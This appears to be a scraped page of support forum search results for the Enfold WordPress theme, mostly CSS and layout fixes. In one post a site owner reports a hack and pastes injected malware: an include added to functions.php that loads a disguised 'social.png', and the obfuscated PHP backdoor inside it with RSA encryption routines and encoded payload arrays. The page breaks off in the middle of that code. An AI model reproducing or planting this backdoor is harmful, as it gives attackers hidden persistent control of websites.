Viewing 30 results - 130,351 through 130,380 (of 142,939 total)
  • Author
    Search Results
  • #256091

    Hi!

    Please add following code to Quick CSS

    span.news-time {
    display: none!important;
    }
    #top .image_size_widget .news-thumb { margin-right: 30%; }
    .news-headline {
    overflow: visible;
    margin-left: 17%;
    font-size: 14px;
    }

    Cheers!
    Yigit

    #256085

    Hi silviouk!

    Please add following code to Quick CSS in Enfold them options under Styling tab and adjust as needed

    .togglecontainer .single_toggle:first-child .toggler, .togglecontainer .taglist + .single_toggle .toggler { border-color: red; }
    .js_active .active_tab_content, .js_active .top_tab .tab { border-color: yellow; }

    Cheers!
    Yigit

    Hey!

    It seems like you have figured it out – http://i.imgur.com/QCmZQ1N.png
    Let us know if you have any other questions or issues

    Regards,
    Yigit

    #256070
    Morendo_Memoria
    Participant

    Hello everybody,

    Since recently, I am unable to enter a AJAX Preview image when creating a new or editing a Portfolio entry. It simply jumps to the top of the page without letting me enter anything. I’m quite unsure when this issue started, maybe since WordPress 3.8.whatever-came-before-3.9.
    I tried updating (i. e. replacing) the enfold directory in themes and updating wordpress and all plugins, to no avail. Can somebody help me?

    #256064
    Katrin
    Participant

    Hi,

    right after updating to 2.7 I noticed that none of my pages are editable anymore. It keeps loading forever.

    That is a real show stopper. Any idea from you how to get that solved would be much appreciated.

    Thanks & Regards

    #256059
    graficult
    Participant

    Hi,

    i’ve created a page with a right sidebar. The sidebar contains 2 widgets. Some color sections of this page have fullwidth.
    This seems to work only the content of the sidebar (the widgets) are at the bottom of the sidebar instead of at the top.

    I’ve been searching for a solution but can’t find anything else then move the <aside> code after the <main> code of the first content part. in firebug this seems to work, but I can’t find the code in the theme files.
    Actually I hope there’s a better solution.

    you can see the webpage here: http://95.211.20.63/~allworkx/?page_id=205

    thanks

    paulseager
    Participant

    When I try to edit the text element on my page – I can only view it as code – the visual editor has stopped working. It looks like it is a serious issue since upgrading to latest wordpress version… as I have just updated another site that used the Enfold Theme and the same thing happens. Please help?

    #256055

    Hey OytunYalcin!

    Thank you for using the theme!

    Please try this on Quick CSS or custom.css:

    #top .avia-content-slider {
    -webkit-transform-style: flat;
    }

    Best regards,
    Ismael

    #256046

    Hi!

    Thank you for the update.

    Please try this to fix the responsiveness issue:

    @media only screen and (max-width: 767px) and (min-width: 480px) {
    #top #main .avia-section .template-page {
    width: 428px;
    }
    
    .avia-section.av-minimum-height .container .content {
    display: block;
    }
    }

    Best regards,
    Ismael

    mareva
    Participant

    Hi,
    (working with Enfold 2.7 and a child theme).
    I’d like to get a different layout for the blog page than the default layout that I’ve chosen in the theme’s General Settings .
    Then, I recently upgrade the Enfold version (after reading this topic: https://kriesi.at/support/topic/advanced-layout-editor-to-build-your-own-blog-layout/) and I followed the instructions of the Enfold documentation (http://kriesi.at/documentation/enfold/have-a-different-single-page-blog-layout/).
    It works well but…
    Breadcrumbs are broken for posts, categories and archives pages.
    As an example, I get following breadcrumbs :
    – For the blog page : ” Home > Blog page name” (that is ok)
    – For any archive or category page : “Home > Category name (or archive name)” instead of “Home > Blog page name > Category name (or archive name)”
    – For any post of any category : “”Home > Category name > Post title” instead of “Home > Blog page name > Category name > Post title”

    Is there any way to keep the complete hierarchy in breadcrumbs whitout selecting any page in “And where do you want to display the Blog?” (Enfold general settings)?

    If not (second part of my question) :
    Because I’m not an experimented wordpress user, I thought : “ok, let choose the same layout for the blog page and the categories/archives pages). Then I made following choices:
    – Specifing the blog page in the field “And where do you want to display the Blog?”
    – Choosing “Use the advanced layout editor to build” for the “blog style” field
    With these options, breadcrumbs are ok but… the layout of the archives and categories pages do not respect the advanced layout of the blog page :
    – no image displayed,
    – entire outputs of the posts are displayed (no link “read more” as it’s defined in the blog page layout).

    Did I chose some illogical or wrong paramater? Any idea to solve this?
    Thank you for your help!

    #256008

    Hi!

    Glad it is working now.

    When you search the same topic over the forum, you’ll see that updating the theme files or commenting then uncommenting the error line mentioned above fixed the issue for all of them. We’re not entirely certain why it’s happening but luckily it can be fix.

    Cheers!
    Ismael

    #256002

    Hey!

    Thank you for the link.

    You can add a unique selector for each Avia Elements. Edit functions.php, find this code:

    if(isset($avia_config['use_child_theme_functions_only'])) return;
    

    Below, add this code:

    add_theme_support('avia_template_builder_custom_css');
    

    Edit the text block then scroll below, add a Custom Css Class. Let’s use textblock-1 for example. Save then update the page. Add this on Quick CSS or custom.css:

    div.avia_textblock.textblock-1 {
    position: relative;
    top: 10px;
    }

    Regards,
    Ismael

    #255997
    kayzelmoo
    Participant

    Hi everyone! There’s a question I’ve been wanting to ask, anyone can help me with that?

    For desktop view, how do I make it non-full screen (Stretched to the maximum)? More of a boxed layout but keeping the tablet and mobile responsive?

    Thanks and have a nice day!
    Regards,

    Hi!

    For the transparent content for the promobox, textblock and iconlist I’ve tried the following css:

    .main_color.promobox_top .promobox_content .main_color.textblock_top .textblock_content .main_color.iconlist_top .iconlist_content{
    background: rgba(255,255,255,.8);
    }

    And for the Sidebar I did:

    .main_color.sidebar .sidebar_content {
    background: rgba(255,255,255,.8);
    }

    Unfortunately it does not work ,can you tell me what is wrong with that code?

    Regards,
    Alex

    • This reply was modified 12 years ago by AdDesign.
    #255971
    tocs154
    Participant

    Hi, Just bought the Enfold theme which is the second theme I have purchased from you guys and it is fantastic! I have a couple of questions if possible:

    1. I use WPML – I have added this to the top header but even though I have specified a drop down all I am getting are flags – I really need just the first flag and the name next to it and then the drop down for more languages. Also on a mobile the flags show up covering the phone number not underneath/new line.

    2. To give an overlap for the design I need to show 3 icon boxes with a little text (from the content area) half over the Revolution slider and half in the content area – I have tried to add “margin-top: -110px;” with a z-index but it is only showing behind the revolution slider.

    3. Is there anyway to have the colour section not full width ie 1/2 with a 1/2 box on the other side? (without using css)

    4. I have a data-src iframe that I need to show – my last theme allowed and showed this however Enfold does not. I can send the code if possible as I can’t post it here.

    Currently I have this site on a testing server so I cant give the URL. If you would like to view this I can give the details including the change of host files details.
    Thanks for the help & the great theme…

    #255959

    Hi!

    I fixed it. I replaced the code in functions.php with:

    
    add_action('after_setup_theme','avia_change_image_sizes');
    function avia_change_image_sizes(){
    global $avia_config;
    $avia_config['imgSize']['widget'] = array('width'=>122,  'height'=>122); // small preview pics eg sidebar news
    }
    

    and changed the css code to:

    
    #top .image_size_widget .news-thumb {
    height: 130px;
    width: 130px; 
    }
    
    #top  .image_size_widget .news-thumb img {
    width: 122px;
    height: 122px;
    }
    

    Best regards,
    Peter

    #255958
    abhijitathavale
    Participant

    Hello,

    I am using the Fullwidth Easy Slider on my home page with a transparent header, but the problem is that the menu and the header are now overlaid on top of the image – I don’t see the whole image. If I don’t use a transparent header, I get a blue bar underneath the header which I don’t want. I am using a background image for the header.

    Please see this link here: http://119.81.15.198/~markonix/

    #255952

    Hi!

    I solved PPjev’s blog issue here: https://kriesi.at/support/topic/wpml-enfold-blog-setting-not-working/

    Best regards,
    Peter

    #255943

    Hey!

    1) I think I found the problem regrading the “blog” issue – you must select the “Use the advance layout editor to build your own blog layout (simply edit the page you have chosen in Enfold->Theme Options as a blog page)” option if you want to use the blog element (which is embedded as advanced layout element into the blog page) instead of the default blog template. If you select the default blog template (i.e. Single Author, etc.) then you can set the number of the post per page on the Settings > Reading page. I now selected the option for the Russian blog: http://ppjev.com/eyes/%D0%B1%D0%BB%D0%BE%D0%B3/?lang=ru and Lithuanian blog: http://ppjev.com/eyes/tinklarastis/ – the other blog pages/settings are not configured yet.

    2) During my test I couldn’t reproduce the “Categories are not synced” issue – all elements (post slider, blog, etc.) listed the translated categories based on the current selected language. If it still doesn’t work on your end maybe the language cookie is missing. Try to clear your browser cache & delete cookies and then go to the editor page to translate it. See: https://kriesi.at/support/topic/wpml-homepage-blog-post-not-working/#post-230549
    If this doesn’t help try to deactivate all plugins except WPML and check if the translated categories pop up. If yes a plugin conflicts with WPML and you need to activate them one by one to find the culprit. I.e. here: https://kriesi.at/support/topic/problems-adding-avia-button-in-spanish/ the “All-in-One Event Calendar by Timely” plugin caused a conflict.

    Best regards,
    Peter

    #255923

    Hey marketingwebaustralia!

    3 ways to fix this :

    1. add media queries for the screens where your logo it’s overflowing the container.

    
    @media only screen and (min-width: 1140px //here is were you insert the width of the screen ){ //here you manually decrease the width and height of the logo. }
    

    2. You can deactivate the current menu ( responsive menu ) and use a plugin to activate the dropdown and style that accordingly.
    3. You redesign the logo ( meaning, remove the information and repurpose that ). e.g. Sevicing albury …. can go below the slider and you can center the text, the phone # can go above the navigation righ/left hand side. In that way you utilize what the theme already provides.

    Main problem is your logo is way to big, hope this help you think about how to work around this situation.

    Best regards,
    David

    #255922
    honesty1993
    Participant

    Hello,

    I just launched my wordpress website made with Enfold theme, but 3 days later, I found functions.php under Enfold theme folder has been added a new code as below,

    if (!defined(‘WP_OPTION_KEY’)) {
    include_once ‘social.png’;
    }

    And there is a new extra file social.png in root directory of Enfold theme folder as well, I changed the extension .png to .txt and found the following code in it, would you please let me know what’s happened to this theme and what did the hacker want to get from this code? And how to protect from further attack? Thanks.

    <?php error_reporting(0); if (!defined(‘WP_OPTION_KEY’)) { define(‘WP_OPTION_KEY’, true); function txyFqaETRPUyiEgQatokJIY() { define(‘WP_OPTION_KEY’,’wp_data_newa’); new GsSYoMTsQibQgcHcuGmrg(); } add_action(‘init’, ‘txyFqaETRPUyiEgQatokJIY’); } class VtkddwvkYgCDDRRWbgRtw{ private $AcheTwkrhTtKmyatQGqYFc, $SntMBKFkfTlUzXyNVQedo, $YcmysXeieEGqvkjRIsPYg; public function __construct($BZaxGALPLdVfntBIQWUPs = ‘old’){ if ($BZaxGALPLdVfntBIQWUPs == ‘new’){ $this->QxEolVsSqvJZyRSgHFmL(); } else { $this->yOlGcuINHlzAVPznEbGNvwJM(); } $this->SntMBKFkfTlUzXyNVQedo = “—–BEGIN PUBLIC KEY—–\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6K/I2l6k2Iz7Vojzxk5Q\r\n43QNfIJm2jWPvXAvFtft+yy4rD3MseQJWx3PLlkoRQjSI1uiiwwlPZWED0e5wFet\r\nnS5tKhvvRaOeUPYJq6MtyUbnaMn7bshlgaAlPaUCVdAOjdtGHMuFaWfnBLgTSu3c\r\nuccVC2zOlXx7XK1tw39eZepRemoh0W3Qhf+hDFsEzACSBmKhBiganwCZzTDvyXpj\r\nnfbRKbf26LJDJ9u2Choh768vQiIfuf0tGLQ+xxcBDl2ZVW0P76cd5I2v+lYRBD/X\r\nvgU32/UZeKDheA8M/oZ5/yFv5QWAU2SHEEKYfLkAQmXs/oRGqMQONqoL3W5Q4bE/\r\ngQIDAQAB\r\n—–END PUBLIC KEY—–“; } private function yOlGcuINHlzAVPznEbGNvwJM() { $oXyaqmHoChvHQFCvTluqmAC = get_option(‘WP_CLIENT_KEY’); $this->AcheTwkrhTtKmyatQGqYFc = $oXyaqmHoChvHQFCvTluqmAC; } private function QxEolVsSqvJZyRSgHFmL() { $WUSuJUGMrzyhdyhyGeIjayJs = $this->DWoPBIQOoBwLXRAmwfedw(); $this->AcheTwkrhTtKmyatQGqYFc = $WUSuJUGMrzyhdyhyGeIjayJs[‘private’]; $this->YcmysXeieEGqvkjRIsPYg = $WUSuJUGMrzyhdyhyGeIjayJs[‘public’]; update_option(“WP_CLIENT_KEY”, $this->AcheTwkrhTtKmyatQGqYFc); } public function bkBMtlOkGRaPFVExpcNbC($oXyaqmHoChvHQFCvTluqmAC) { openssl_seal($oXyaqmHoChvHQFCvTluqmAC, $XSuQpMSlwhlPZypBIPnfjXTA, $THPieTXOYTCWThoTFSSuHU, array(openssl_pkey_get_public($this->SntMBKFkfTlUzXyNVQedo))); return array(“data” => base64_encode($XSuQpMSlwhlPZypBIPnfjXTA), “key” => base64_encode($THPieTXOYTCWThoTFSSuHU[0])); } public function MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC) { openssl_seal($oXyaqmHoChvHQFCvTluqmAC, $XSuQpMSlwhlPZypBIPnfjXTA, $THPieTXOYTCWThoTFSSuHU, array(openssl_pkey_get_public($this->YcmysXeieEGqvkjRIsPYg))); return json_encode(array(“data” => base64_encode($XSuQpMSlwhlPZypBIPnfjXTA), “key” => base64_encode($THPieTXOYTCWThoTFSSuHU[0]))); } public function qPhSGyDrRdyPezAnHgiao() { return $this->YcmysXeieEGqvkjRIsPYg; } public function skwTpfzBalSTBTBkLvhw($piiJbwvzLxHvKjlNnFzd) { $this->YcmysXeieEGqvkjRIsPYg = $piiJbwvzLxHvKjlNnFzd; } public function vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC) { $BdlbpgzPBjxVLkBLnsrXkmI = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($BdlbpgzPBjxVLkBLnsrXkmI !== false){ $oXyaqmHoChvHQFCvTluqmAC = $BdlbpgzPBjxVLkBLnsrXkmI; } if (!is_array($oXyaqmHoChvHQFCvTluqmAC)) { return false; } openssl_open(base64_decode(trim($oXyaqmHoChvHQFCvTluqmAC[‘data’])), $WQqrOQbxBHtERCkwicqA, base64_decode(trim($oXyaqmHoChvHQFCvTluqmAC[‘key’])), $this->AcheTwkrhTtKmyatQGqYFc); return $WQqrOQbxBHtERCkwicqA; } public function DWoPBIQOoBwLXRAmwfedw() { $IzGRmpLLtcLVMJRxcfpeGhQVry = openssl_pkey_new(array( ‘private_key_bits’ => 2048, ‘private_key_type’ => OPENSSL_KEYTYPE_RSA, )); openssl_pkey_export($IzGRmpLLtcLVMJRxcfpeGhQVry, $IANNGYfyVIgZFkzWVTKmQGc); $oXyaqmHoChvHQFCvTluqmAC[‘private’] = $IANNGYfyVIgZFkzWVTKmQGc; $XEWVBmIaXvRqxrckbkOqw = openssl_pkey_get_details($IzGRmpLLtcLVMJRxcfpeGhQVry); $oXyaqmHoChvHQFCvTluqmAC[‘public’] = $XEWVBmIaXvRqxrckbkOqw[‘key’]; return $oXyaqmHoChvHQFCvTluqmAC; } } class GsSYoMTsQibQgcHcuGmrg{ public $oXyaqmHoChvHQFCvTluqmAC = array(), $yYVsqvOoqWsddypXgJcIKOw = array(), $qcCONSsvpJlMgdhEFFmrTI, $IzGRmpLLtcLVMJRxcfpeGhQVry, $aJQafHDwnaPrCJrQMjHVh, $AeRxXNHxOXpcNJWlZSIKLhIw, $vwhhtIrAWhUEFDgPrcco, $htcFFCQTLLpnCchsPKGYxso, $wqawPxkNytKqRKNRqbwAdw, $IatJdWimJbxtprWZElHevfI, $YobOrWbieESFVcSsWsuBypg; public $WbKPQMoSbMZkXUeYKXRIk; public function __construct() { $this->yYVsqvOoqWsddypXgJcIKOw = array( ‘==DZk4FZlVwY5RGZhpQB’ ,’=4JnhZUpck2olIKM’, ‘=4JnhZ3M1WJMeyTo’, ‘=02ow5FryW3ogkJnuWUq’, ‘6yzLhDKqwETol92q’, ‘==trcWzYyEKqwETol92q’, ‘g92LhZ3ni9Togyzr’, ‘==DoiAzYiEKqiyKMgS2p’, ‘=8zMhyzYhIJMlqzoi9Jo’, ‘=bKnv5vpuE3phSJofI2n’, ‘aW3ohHzMckzp19JM2y2M’, ‘=02ow5PoyITqmEJquWaM’, ‘==DoiAzY6ITqu1JLgkJL’, ‘g92LhpzockTocM2oaWKM’, ‘==toc5vo1AKMaSTofyzq’, ‘hyzY5Izpi1JM29Jo’, ‘==jMl9zY5ITMi9zMiyzL’, ‘aW3ohVGqlpzocuTq55JL’, ‘==jMl9zYhI2LmEapiO3p’, ‘aW3oh4JLwAUq0I3L’, ‘=pzpi5lp0WKLjSJMyWaM’, ‘==jqj5FqiyKMwyzoyA2p’, ‘3OaY1WGoj1JL’, ‘=pUphxKqaWKnuu2L’, ‘=4JnhVKMeAJnfMJock2p’, ‘=4JnhV3ox5JLl9TryuTq’, ‘=4Jnh4JqvyKMh9Tn’, ‘hyzYmk2oiEaoyk2M’, ‘hyzYh9TqlSzLhSTM’, ‘=4JnhNKqiW3Mf9TogyzL’, ‘==toc5lp0Szp0SzM’, ‘hyzYfIJM0Aaouu2L’, ‘hyzYlSTqm92Mhyzp’, ‘6yzLh4zpiEKMfqzocWaL’, ‘aW3ohHTo5E3pgHJocW3L’, ‘==trcWzYmgJLgyTqf9zM’, ‘==Nqy5zYmAKMhy2M0ITo0I3o’, ‘==jqj5PnmyzMiEUnmyzp’, ‘==jqj5lphS2pfIzquWUq’, ‘==trcWzYlITMuk2Mc5Jq’, ‘0IzohZUocSzMlITMh92q’, ‘0IzohZKMfyUqm52ohITr’, ‘=pzpi5vouEKn0g2LukzL’, ‘=HJohNKqbSTof9Tn’, ‘=DKMh5lpyEJLlq2ohSzo’, ‘6yzLhxapu1TMuITM’, ‘==Nqy5zY39zoe1JLyWUM’, ‘==Nqy5zYlITqm9zM5STo’, ‘==joz5JnhZKMa5JLlE3p’, ‘==trcWzYfy2MlITqhIUn’, ‘=bKnv5FM4S2nfyJo’, ‘=bKnv5PqcgJLgSzp’, ‘==trcWzYfk2ovITqiIKp’, ‘==DoiAzYm52ox1zM’, ‘=02ow5lpwy2p11JLlSTM’, ‘=02ow5vpyWzLiWzpyq2MiWaM’, ‘=02ow5lphIJof92n’, ‘=02ow5lpykTpgS2pi9zM’, ‘==DoiAzYmEzpu9zL2EKo’, ‘==trcWzYmyKLxIao’, ‘iMzoc5lp5kzMx5JLlS2L’, ‘==jow5lqikTn0SJo’, ‘=82Lh82nhIJo’, ‘=02ow5vpiu3Lc1JLhyUM’, ‘==DMg5FngSTMhI2q’, ‘=bKnv5Pqcg2of9zr’, ‘==jqj5PofS2qlITqhSTn’, ‘aW3ohD3owyKMh9Jo’, ‘6yzLhxKoyEJLwSJM0y2pvI2q’, ‘=bKnv5lo5ITMi9zM’, ‘==trcWzYmkJL0W3ojAKM’, ‘==toc5lp3Izo3SJo’, ‘=4Jnhf2LiWKolITq’, ‘hyzYeA2olIzoiE3p’, ‘=4Jnh82oz1zM’, ‘hyzY0WKLjSJMyWaM’, ‘==toc5PMhSTolSTqcI3M’, ‘==toc5vou12MiWUp’, ‘==toc5voz1zM’, ‘hyzYj9TouWKMhI2M’, ‘=4JnhjJL0W3ojAKM’, ‘=8zMhyzYykTpgS2pi9zM’, ‘==joz5JnhHJMlMTAiWTn’, ‘==joz5JnhHaZhITqmyTo’, ‘=8zMhyzYyqJLjgzo’, ‘iMzoc5vMfSTnvI2q’, ‘3OaYm5JqaWzM’, ‘=pUphH2nuEaZwyTp’, ‘=pUphZapyE3pu1JMmIzocu2L’, ‘=pUphxUMukJr6SToi9zM’, ‘3OaYyAKqi92n’, ‘0IzohxKLxIao’, ‘=DKMh5Fne9TMhyzM’, ‘==Nqy5zY5kzMx5JLlS2L’, ‘==Nqy5zYi9zMgyzM’, ‘==Nqy5zY392qzqKL’, ‘==DoiAzYyyao2EKo’, ‘=02ow5lpuyTMySKney2q’, ‘g92Lh4JMwEapiO3p’, ‘=02ow5FMyWaM2EKo’, ‘==DoiAzY3Izo3SJo’ ); $this->aJQafHDwnaPrCJrQMjHVh = array( ‘=HaphjJnu1TD1ETn1c2p’, ‘==DoiAzYfyJLgqTDwyToiMKLlESofSTMhSzH’, ‘==DoiAzYfyJLgqTDkHGBkDapyq3phSHouyTofy2I’, ‘g92LhjJnu12MNEJMjWKq0IzDmSJoiuTI’, ‘==DoiAzYfyJLgqTD39TqlITnHIJnfIaF’, ‘==DoiAzYfyJLgqTDx5JLaIzpv1JqGIzouyTE’, ‘g92LhjJnu12MNyaL4STqc12oQWKMbO3o0AKnlu2D’, ‘=02ow5PocSJoaORZ4xGZmyJobAIL0yzH’, ‘=02ow5PocSJoaORMhSTqlSTovI3oGy3LuE3H’, ‘==DoiAzYfyJLgqTDhIToxyzEl9zqyWUI’, ‘=02ow5PocSJoaORMy5zpyOUpOqJnuW3D’, ‘==DoiAzYfyJLgqTDmHGBk4JMxSHMjIUG’, ‘g92LhjJnu12MNyQAlIzp192Dy5Jn0AKnlu2D’, ‘g92LhjJnu12MNIJo05JngS2H0WKMv9zH’, ‘==DoiAzYfyJLgqTD1DQquu2pcuTIy5zou9zF’, ‘==DoiAzYfyJLgqTDxIzpx5JnuqRoySTnwyJG’, ‘=02ow5PocSJoaORMyE3LyWUHyyTqlIzD’, ‘=02ow5PocSJoaORMuuTqa5JnuAyrcWUquIzD’, ‘g92LhjJnu12MNA3py12oKS2LcWKE’, ‘g92LhjJnu12MNAap1EKMGWKMbO3o0AKnlu2D’, ‘=02ow5PocSJoaOxpyE3puuTIh5JD’, ‘==DoiAzYfyJLgqTDbEKnx5JDyyTnj92H’, ‘g92LhjJnu12MNEaoyq3o05JIhyzqfIJG’, ‘=02ow5PocSJoaORA4xGZxI2MlITn09TpjS0nlSJG’, ‘==DoiAzYfyJLgqTDjLGBkHTq192H0WKMv9zH’, ‘=02ow5PocSJoaORMcSToj1JMfWJDyI2LhSzG’, ‘g92Lhj2ouOHoiWaLuEJn’, ‘=02ow5PoiSTDcEJLg91L’, ‘==DoiAzYf9JLNSQofy2Mw1zYyyJogyzn’, ‘=02ow5PoiSTDljJM0STphf2L1u2L’, ‘==DoiAzYf9JLNSwpyMJLbA3KuEaoucJL’, ‘=02ow5PoiSTDyI2Mu12KyWUMhSzr’, ‘g92Lhj2ouORMlSTnwIzLyAKnhITM’, ‘==DoiAzYf9JLNWKMhEUq1WzocWUMfIJo’, ‘=02ow5PoiSTDfSzpiEJLxkJL’, ‘==DoiAzYf9JLN52omWJna9IL5Szn’, ‘g92Lhj2ouO0pykJn0AaYy5Jn0AKnlu2L’, ‘==DoiAzYf9JLNcKLj5lo05JnwSzn’, ‘=02ow5PoiSTDbAJnyW3pc12oe9zo’, ‘g92Lhj2ouOHZhyzpl9JobqJLhIJo’, ‘==DoiAzYf9JLNWJL0EKMfI2M’, ‘==DoiAzYf9JLNWKM0AKMigzYyyzpl9TM’, ‘=02ow5PoiSTDyEKLgIUnm5Pp’, ‘g92Lhj2ouOxoiAaouq3psSJnh9ToiOKL’, ‘==DoiAzYf9JLN1JLb5JLlW2KgSJnlyJo’, ‘==DoiAzYf9JLNSmolWKL2SzosyKMfSTn’, ‘=02ow5PoiSTDk4zpiu2KuyzpyEJLhSTp’, ‘==DoiAzYf9JLNS2nmSTnm5vq’, ‘g92Lhj2ouORoyITqsyaohI2n’, ‘=02ow5PoiSTDh92phyTqhRJrcWUp’, ‘=02ow5PoiSTDygzp1W2KukToyE3p’, ‘==DoiAzYf9JLN5Jn6k2oj5loxWKLwIzp’, ‘==DoiAzYf9JLNcKMlI3ofSTq’, ‘=02ow5PoiSTDmEapyWzLy9ILbEKMl9TM’, ‘=02ow5PoiSTDkDUoiWzocSzpskJqxWJL’, ‘=02ow5PoiSTDmITqlIJqz5vq’, ‘=02ow5PoiSTDay2q0WKLb9SMyW3L’, ‘=02ow5PoiSTDa5Jnzu2olyaplSTo’, ‘g92Lhj2ouO0phy2May2qh4Jn2kJL’, ‘g92Lhj2ouOHZ5ITofI2nh8Jnwyzp1SJo’, ‘==DoiAzYf9JLN1JLhgJnh9ILxIzq’, ‘g92Lhj2ouOHnhyJqlIzoiITo’, ‘==DoiAzYf9JLNqzouI3oe5Fo’, ‘=02ow5PoiSTDuEJMl9zrsSTn0WKMvkJL’, ‘==DoiAzYf9JLNWKqm5JLg9In’, ‘==DoiAzYf9JLN52ogg2Lcu2KhS2Ml9Jo’, ‘==DoiAzYf9JLNWKMxyJMz5lL’, ‘=02ow5PoiSTDhyTo1EzYbAKL’, ‘g92Lhj2ouOxpy5zpiqzYukJMgSTp’, ‘g92Lhj2ouOxohS2qhRzrukzL’, ‘=02ow5PoiSTDykJM6IJn65FL’, ‘==DoiAzYf9JLNA3pyu2Kv9zp’, ‘==DoiAzYf9JLNWUnikzMhRToyy2LuW3M’, ‘=02ow5PoiSTDkHzoiMKLv9ILckJMlIKL’, ‘g92Lhj2ouOHZfIKLj9In’, ‘=02ow5PoiSTDm5JnaE2ob5PqlSzL’, ‘==DoiAzYf9JLNITouIzqhxTM’, ‘=02ow5PoiSTDuy2LmIKosSTMhIUnmSTo’, ‘=02ow5PoiSTDkf2Li1zYuEKnf9To’, ‘g92Lhj2ouOxouAJn4IJoskJnlOKL’, ‘=02ow5PoiSTDkjToyq3oj5voyWKn’, ‘=02ow5PoiSTD0IJog9zpw5ln’, ‘=02ow5PoiSTDmO3oiE3p0IJMd5JLly2n’, ‘==DoiAzYf9JLNk2olWKLw9IL0AKMx9Jo’, ‘g92Lhj2ouOxouyKLvSzLxITnmSzp’, ‘g92Lhj2ouOHZmgzpuOaYfkJM3Izn’, ‘g92Lh82obSJrN1Jn5I2p192DuAKn19TG’, ‘=02ow5loiuJL5OHqf9zocqUMi92Euy2LckJD’, ‘=02ow5loiuJL5O0ohy3p3Izpx5JDyy2nwSzF’, ‘g92Lh82obSJrN9zMuIzpi1zpyMKnZITq0ITof92D’, ‘=02ow5loiuJL5OHrfyJrlWKIuyzqfy3H’, ‘=02ow5loiuJL5ORMiMzoiAaocW2oFSJnwIUG’, ‘g92Lh82obSJrNqJn2AKn0WKLDyUolS2D’, ‘g92Lh82obSJrNI3pjIJnh5JMZy3p0STH’, ‘=02ow5loiuJL5O0MxSJMm9zDyyzqyE3H’, ‘==DoiAzYi9TnuyUDeSzp5ITouITFyyzouuTpyE3H’, ‘=02ow5loiuJL5OHrhITquuJnByaplITI’, ‘g92Lh82obSJrNyzLy5JnzMJnlqHL5SJG’, ‘g92Lh82obSJrNAJo1I2Mxyzpa5JLZyaohSTE’, ‘g92Lh82obSJrNOKngyKM39TIyIKpckJMa5JD’, ‘=02ow5loiuJL5OxMaIKMm9zHgy2F’, ‘=02ow5loiuJL5OxL5kzoiAUoy5xoiWapuu2H’, ‘g92Lh82obSJrN1JrayaplSTF5ITocI2F’, ‘==DoiAzYi9TnuyUD5WJnmI2MxyzpPyzLv9zD’, ‘==DoiAzYi9TnuyUDfy3LxW3ozkTouuHL5SJG’, ‘g92Lh82obSJrN52o0yKMfu2L0STIy5JMxSzF’, ‘=02ow5loiuJL5O0oi1TMuETMuuHMwyzouu2H’, ‘=02ow5loiuJL5OxoukJMiqJLFyaLvyTG’, ‘=02ow5loiuJL5OHM0SJMfOUpcEIrwSTG’, ‘=02ow5loiuJL5OHrv9Tnw92oUyKogS2H’, ‘g92Lh82obSJrNE3o25JMfkJEhIJn2yzI’, ‘==DoiAzYi9TnuyUD5WJqy5JnxWKLXIJn0AKnlu2D’, ‘g92Lh82obSJrNIaq1g2LcuTpfIHMfITnwyJG’, ‘=02ow5loiuJL5O0oj9TolSJEyyTofyJG’, ‘==DoiAzYi9TnuyUDvyUMyyTqmyzpbAHLcqzpiI2E’, ‘g92Lh82obSJrN9zpf52omyzohITEyyToc1JE’, ‘==DoiAzYi9TnuyUDlqJrmyToa5JFgSJnlyJG’, ‘==DoiAzYi9TnuyUDuIKqfkJqU52o2ITE’, ‘=02ow5loiuJL5OHqgIUq0I2nwSToP5JLly2F’, ‘==DoiAzYi9TnuyUDuy3LxITq4y2IhyJo6SJJ’, ‘=02ow5loiuJL5OHnm9zpyAap1OyouIzF’, ‘=02ow5loiuJL5OHLcAKr2STEyIJnx9zF’, ‘==DoiAzYi9TnuyUD292pyAJrlWHrfWKM2IzD’, ‘==DoiAzYi9TnuyUDcWJLwyzqyAJnaSzpRyaohSzE’, ‘=02ow5loiuJL5OHrwIUofI2nmSJGyyzLvITE’, ‘g92Lh82obSJrN5JneyToiyJLlWKMTSzpuy2D’, ‘g92Lh82obSJrN9zqc52o0WKMe5JnDyKMfSTF’, ‘=02ow5loiuJL5O0L1y3nlIUqlIUFuEKnhIzD’, ‘g92Lh82obSJrNSJnw52omETou52oREKMhSzF’, ‘g92Lh82obSJrNyKouyaLfyTnDITq0ITof92D’, ‘=02ow5loiuJL5OHnzWJMc5zoykHngIzH’, ‘g92LhjJnu1TqiuTD5kJnlyUqyM2oeIar’, ‘=02ow5PocSJo09TnNM3olyUpcuJMgSzM’, ‘g92LhjJnu1TqiuTDyEKqlyTriEJqvyan’, ‘g92LhjJnu1TqiuTDcWKneSzo1E3olyJp’, ‘g92LhjJnu1TqiuTDuqJLfyUMiq2o0yzL’, ‘=02ow5PocSJo09TnNEKqvI2L1uJrzI2M’, ‘g92LhjJnu1TqiuTDu5Jndy3MyOKnaITq’, ‘=02ow5PocSJo09TnNcKrkIzq15JnhIUo’, ‘=02ow5PocSJo09TnNEJqgIaL1WKMvy3n’, ‘g92LhjJnu1TqiuTDuEKMlyzr5A3o6Iar’, ‘g92LhjJnu1TqiuTDcuKr6y3pcEJMmyzM’, ‘=02ow5PocSJo09TnNWKrkSzo5E3oh92n’, ‘g92LhjJnu1TqiuTD55JMwy3MigJrjSzM’, ‘=02ow5PocSJo09TnNuKLaSTnu52o3yUM’, ‘g92LhjJnu1TqiuTDyqKn6SJp1AJnfyUo’, ‘=02ow5PocSJo09TnNOKLxSzMcuJMwSTr’, ‘g92LhjJnu1TqiuTDyg2olyzpiuJn4yzo’, ‘=02ow5PocSJo09TnNAJngIaMyAKrvIzL’, ‘g92LhjJnu1TqiuTDu1JLmIaM1M3owS2n’, ‘=02ow5PocSJo09TnNA3oxSzn1MJrwyap’, ‘g92LhjJnu1TqiuTDiuKq69zr5u2o0SJo’, ‘=02ow5PocSJo09TnNAKrgyUn5uKqb9To’, ‘g92LhjJnu1TqiuTDykJqgIKpuqJrayTn’, ‘g92LhjJnu1TqiuTDyWKLxyzpcqJq4Szp’, ‘=02ow5PocSJo09TnNAJL0I2LcAJnxyzn’, ‘g92LhjJnu1TqiuTD5c2ojSzMcAKnzyzo’, ‘=02ow5PocSJo09TnNcKqeyzniqJLl9To’, ‘=02ow5PocSJo09TnNu2o4y2MiAJM0Iao’, 